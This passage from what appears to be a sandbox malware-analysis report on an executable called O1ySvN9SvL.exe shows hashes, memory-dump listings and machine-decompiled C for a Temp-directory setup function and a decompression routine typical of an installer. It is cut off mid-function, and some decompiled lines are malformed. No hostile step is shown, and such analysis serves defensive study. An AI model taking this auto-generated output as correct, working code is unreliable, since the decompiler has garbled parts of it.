                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                • API String ID: 3712363035-7751565
                • Opcode ID: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                • Instruction ID: 4b3b5e29b82f538c1f6189d2f0b4571506454f650d891e3160212e6729b48b77
                • Opcode Fuzzy Hash: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                • Instruction Fuzzy Hash: 9AE012B4A00209BFDB00EF64ED49E6FBBBCFB10344F808571B914F2151D7B8E9508A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004032C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E004032C6(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405D03(_t6);
				_t2 = E00405654(_t6);
				if(_t2 != 0) {
					E004055E7(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004057FA("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                0x004032c7
                0x004032cd
                0x004032d3
                0x004032da
                0x004032df
                0x004032e7
                0x004032f3
                0x004032f9
                0x004032dd
                0x004032dd
                0x004032dd

                APIs
                  • Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                  • Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                  • Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                  • Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004032E7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Char$Next$CreateDirectoryPrev
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 4115351271-2030658151
                • Opcode ID: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                • Instruction ID: d6c3561ce191540899b591fc5212b2685f70515619ba473533d6486adf82dab9
                • Opcode Fuzzy Hash: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                • Instruction Fuzzy Hash: 6BD0C911656D3072C9523B2A3D0AFCF150C8F5631AF5180BBF908B90C64B6C6A8319EF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004064B8 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                Download Yara Rule
                C-Code - Quality: 99%
                			E004064B8() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406926))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
